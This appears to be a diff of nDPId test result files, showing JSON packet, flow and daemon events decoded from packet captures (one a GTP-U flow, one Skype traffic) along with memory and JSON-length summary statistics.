00472{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":49,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":130,"pkt_l4_len":0,"thread_ts_msec":1550422835423,"pkt":"AAAAcxs8EFFy5LtdCABFeAB0ec4AAEARfEWRTALsu2A0VQhoCGgAYAAAMv8AUAn8kEMGdAAARQAATFlXQAB\/BgFFrBEkFT++kSvhEwBQ8LOPBjqqXxHgEAEBriQAAAEBBSI6qmSJOqpqATqqZIk6qm95OqqgsTqqsLE6qnTxOqqQSQ=="} 00458{"packet_event_id":1,"packet_event_name":"packet","packet_id":49,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":130,"pkt_l4_len":0,"thread_ts_msec":1550422835423,"pkt":"AAAAcxs8EFFy5LtdCABFeAB0ec4AAEARfEWRTALsu2A0VQhoCGgAYAAAMv8AUAn8kEMGdAAARQAATFlXQAB\/BgFFrBEkFT++kSvhEwBQ8LOPBjqqXxHgEAEBriQAAAEBBSI6qmSJOqpqATqqZIk6qm95OqqgsTqqsLE6qnTxOqqQSQ=="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":49,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":130,"expected":134,"global_ts_msec":1550422836805} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":49,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":130,"expected":134,"global_ts_msec":1550422836805}
00448{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":51,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":1550422836808,"pkt":"AAAAcxs8EFFy5LtdCABFeABkCt4AAEAR60WRTALsu2A0VQhoCGgAUAAAMv8AQAn8kEMOdAAARQAAPFlfQAB\/BgFNrBEkFT++kSvhEwBQ8LOPBjqqb3mgEAEBaxMAAAEBBRI6qqCxOqqwsTqqdPE6qpBJ"} 00434{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":1550422836808,"pkt":"AAAAcxs8EFFy5LtdCABFeABkCt4AAEAR60WRTALsu2A0VQhoCGgAUAAAMv8AQAn8kEMOdAAARQAAPFlfQAB\/BgFNrBEkFT++kSvhEwBQ8LOPBjqqb3mgEAEBaxMAAAEBBRI6qqCxOqqwsTqqdPE6qpBJ"}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":51,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1550422837968} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":51,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1550422837968}
00440{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":54,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422837971,"pkt":"AAAAcxs8EFFy5LtdCABFeABcQ5AAAEARspuRTALsu2A0VQhoCGgASAAAMv8AOAn8kEMUdAAARQAANFllQAB\/BgFPrBEkFT++kSvhEwBQ8LOPBjqqkEmAEAEB5OIAAAEBBQo6qqCxOqqwsQ=="} 00426{"packet_event_id":1,"packet_event_name":"packet","packet_id":54,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422837971,"pkt":"AAAAcxs8EFFy5LtdCABFeABcQ5AAAEARspuRTALsu2A0VQhoCGgASAAAMv8AOAn8kEMUdAAARQAANFllQAB\/BgFPrBEkFT++kSvhEwBQ8LOPBjqqkEmAEAEB5OIAAAEBBQo6qqCxOqqwsQ=="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":54,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422838904} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":54,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422838904}
00440{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":57,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422838907,"pkt":"AAAAcxs8EFFy5LtdCABFeABcVMgAAEARoWORTALsu2A0VQhoCGgASAAAMv8AOAn8kEMVdAAARQAANFlmQAB\/BgFOrBEkFT++kSvhEwBQ8LOPBjqqlcGAEAEB32oAAAEBBQo6qqCxOqqwsQ=="} 00426{"packet_event_id":1,"packet_event_name":"packet","packet_id":57,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422838907,"pkt":"AAAAcxs8EFFy5LtdCABFeABcVMgAAEARoWORTALsu2A0VQhoCGgASAAAMv8AOAn8kEMVdAAARQAANFlmQAB\/BgFOrBEkFT++kSvhEwBQ8LOPBjqqlcGAEAEB32oAAAEBBQo6qqCxOqqwsQ=="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":57,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422838960} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":57,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422838960}
00440{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":59,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422838963,"pkt":"AAAAcxs8EFFy5LtdCABFeABc4ZkAAEARFJKRTALsu2A0VQhoCGgASAAAMv8AOAn8kEMfdAAARQAANFlvQAB\/BgFFrBEkFT++kSvhEwBQ8LOPBjqqlcGAEAEB5OIAAAEBBQo6qps5OqqwsQ=="} 00426{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422838963,"pkt":"AAAAcxs8EFFy5LtdCABFeABc4ZkAAEARFJKRTALsu2A0VQhoCGgASAAAMv8AOAn8kEMfdAAARQAANFlvQAB\/BgFFrBEkFT++kSvhEwBQ8LOPBjqqlcGAEAEB5OIAAAEBBQo6qps5OqqwsQ=="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":59,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422840104} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":59,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422840104}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":60,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1550422840104,"pkt":"AAAAcxs8EFFy5LtdCABFeABQIPEAAEAR1UaRTALsu2A0VQhoCGgAPAAAMv8ALAn8kEMgdAAARQAAKFlwQAB\/BgFQrBEkFT++kSvhEwBQ8LOPBjqqsLFQEAEBwUkAAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":60,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1550422840104,"pkt":"AAAAcxs8EFFy5LtdCABFeABQIPEAAEAR1UaRTALsu2A0VQhoCGgAPAAAMv8ALAn8kEMgdAAARQAAKFlwQAB\/BgFQrBEkFT++kSvhEwBQ8LOPBjqqsLFQEAEBwUkAAA=="}
00253{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":60,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":94,"expected":98,"global_ts_msec":1550422840304} 00239{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":60,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":94,"expected":98,"global_ts_msec":1550422840304}
00440{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":71,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422840306,"pkt":"AAAAcxs8EFFy5LtdCABFeABcV2kAAEARnsKRTALsu2A0VQhoCGgASAAAMv8AOAn8kEMhdAAARQAANFlxQAB\/BgFDrBEkFT++kSvhEwBQ8LOPBjqqsLGAEAEB5OIAAAEBBQo6qpXBOqqbOQ=="} 00426{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422840306,"pkt":"AAAAcxs8EFFy5LtdCABFeABcV2kAAEARnsKRTALsu2A0VQhoCGgASAAAMv8AOAn8kEMhdAAARQAANFlxQAB\/BgFDrBEkFT++kSvhEwBQ8LOPBjqqsLGAEAEB5OIAAAEBBQo6qpXBOqqbOQ=="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":71,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422840464} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":71,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422840464}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":72,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1550422840464,"pkt":"AAAAcxs8EFFy5LtdCABFeABQeDYAAEARfgGRTALsu2A0VQhoCGgAPAAAMv8ALAn8kEMndAAARQAAKFl3QAB\/BgFJrBEkFT++kSvhEwBQ8LOPBjqqtilQEAEBu9EAAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1550422840464,"pkt":"AAAAcxs8EFFy5LtdCABFeABQeDYAAEARfgGRTALsu2A0VQhoCGgAPAAAMv8ALAn8kEMndAAARQAAKFl3QAB\/BgFJrBEkFT++kSvhEwBQ8LOPBjqqtilQEAEBu9EAAA=="}
00253{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":72,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":94,"expected":98,"global_ts_msec":1550422841363} 00239{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":72,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":94,"expected":98,"global_ts_msec":1550422841363}
00440{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":75,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422841366,"pkt":"AAAAcxs8EFFy5LtdCABFeABcgJcAAEARdZSRTALsu2A0VQhoCGgASAAAMv8AOAn8kEModAAARQAANFl4QAB\/BgE8rBEkFT++kSvhEwBQ8LOPBjqqtimAEAEBiLoAAAEBBQo6qsEZOqrGkQ=="} 00426{"packet_event_id":1,"packet_event_name":"packet","packet_id":75,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422841366,"pkt":"AAAAcxs8EFFy5LtdCABFeABcgJcAAEARdZSRTALsu2A0VQhoCGgASAAAMv8AOAn8kEModAAARQAANFl4QAB\/BgE8rBEkFT++kSvhEwBQ8LOPBjqqtimAEAEBiLoAAAEBBQo6qsEZOqrGkQ=="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":75,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422841387} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":75,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422841387}
00448{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":76,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":1550422841387,"pkt":"AAAAcxs8EFFy5LtdCABFeABk3UcAAEARGNyRTALsu2A0VQhoCGgAUAAAMv8AQAn8kEMpdAAARQAAPFl5QAB\/BgEzrBEkFT++kSvhEwBQ8LOPBjqqtimgEAEBStoAAAEBBRI6qtGBOqrW+TqqwRk6qsaR"} 00434{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":1550422841387,"pkt":"AAAAcxs8EFFy5LtdCABFeABk3UcAAEARGNyRTALsu2A0VQhoCGgAUAAAMv8AQAn8kEMpdAAARQAAPFl5QAB\/BgEzrBEkFT++kSvhEwBQ8LOPBjqqtimgEAEBStoAAAEBBRI6qtGBOqrW+TqqwRk6qsaR"}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":76,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1550422841667} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":76,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1550422841667}
00448{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":77,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":1550422841667,"pkt":"AAAAcxs8EFFy5LtdCABFeABkO3EAAEARurKRTALsu2A0VQhoCGgAUAAAMv8AQAn8kEMqdAAARQAAPFl6QAB\/BgEyrBEkFT++kSvhEwBQ8LOPBjqqtimgEAEBRWIAAAEBBRI6qsEZOqrMCTqq0YE6qtb5"} 00434{"packet_event_id":1,"packet_event_name":"packet","packet_id":77,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":1550422841667,"pkt":"AAAAcxs8EFFy5LtdCABFeABkO3EAAEARurKRTALsu2A0VQhoCGgAUAAAMv8AQAn8kEMqdAAARQAAPFl6QAB\/BgEyrBEkFT++kSvhEwBQ8LOPBjqqtimgEAEBRWIAAAEBBRI6qsEZOqrMCTqq0YE6qtb5"}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":77,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1550422841947} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":77,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":114,"expected":118,"global_ts_msec":1550422841947}
00460{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":78,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422841947,"pkt":"AAAAcxs8EFFy5LtdCABFeABsXowAAEARl4+RTALsu2A0VQhoCGgAWAAAMv8ASAn8kEMydAAARQAARFmBQAB\/BgEjrBEkFT++kSvhEwBQ8LOPBjqqtinAEAEB0NEAAAEBBRo6quzZOqryUTqqwRk6qswJOqrRgTqq1vk="} 00446{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422841947,"pkt":"AAAAcxs8EFFy5LtdCABFeABsXowAAEARl4+RTALsu2A0VQhoCGgAWAAAMv8ASAn8kEMydAAARQAARFmBQAB\/BgEjrBEkFT++kSvhEwBQ8LOPBjqqtinAEAEB0NEAAAEBBRo6quzZOqryUTqqwRk6qswJOqrRgTqq1vk="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":78,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422842802} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":78,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422842802}
00460{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":79,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842802,"pkt":"AAAAcxs8EFFy5LtdCABFeABsdGMAAEARgbiRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEMzdAAARQAARFmCQAB\/BgEirBEkFT++kSvhEwBQ8LOPBjqqtinAEAEB1kkAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="} 00446{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842802,"pkt":"AAAAcxs8EFFy5LtdCABFeABsdGMAAEARgbiRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEMzdAAARQAARFmCQAB\/BgEirBEkFT++kSvhEwBQ8LOPBjqqtinAEAEB1kkAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":79,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422842862} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":79,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422842862}
00460{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842865,"pkt":"AAAAcxs8EFFy5LtdCABFeABsUeoAAEARpDGRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEM8dAAARQAARFmLQAB\/BgEZrBEkFT++kSvhEwBQ8LOPBjqqu6HAEAEB0NEAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="} 00446{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842865,"pkt":"AAAAcxs8EFFy5LtdCABFeABsUeoAAEARpDGRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEM8dAAARQAARFmLQAB\/BgEZrBEkFT++kSvhEwBQ8LOPBjqqu6HAEAEB0NEAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="}
00255{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422844222} 00241{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422844222}
00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
00485{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","packets-captured":82,"packets-processed":82,"total-skipped-flows":0,"total-l4-data-len":74496,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":65,"global_ts_msec":1550422844224} 00485{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","packets-captured":82,"packets-processed":82,"total-skipped-flows":0,"total-l4-data-len":74496,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-events-serialized":65,"global_ts_msec":1550422844224}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -75,6 +75,6 @@
~~ total memory freed........: 4682176 bytes ~~ total memory freed........: 4682176 bytes
~~ total allocations/frees...: 101225/101225 ~~ total allocations/frees...: 101225/101225
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 258 chars ~~ json string min len.......: 244 chars
~~ json string max len.......: 703 chars ~~ json string max len.......: 703 chars
~~ json string avg len.......: 474 chars ~~ json string avg len.......: 467 chars

8
test/results/skype_no_unknown.pcap.out
View File

@@ -502,8 +502,8 @@
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9lmMAAEARmbbAqAEinTfrlDLdnGEAKXtSe2sCw7Vy\/6hHK2XTagfLmixWAHOAd\/loE1p\/EyV7QPa1"} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9lmMAAEARmbbAqAEinTfrlDLdnGEAKXtSe2sCw7Vy\/6hHK2XTagfLmixWAHOAd\/loE1p\/EyV7QPa1"}
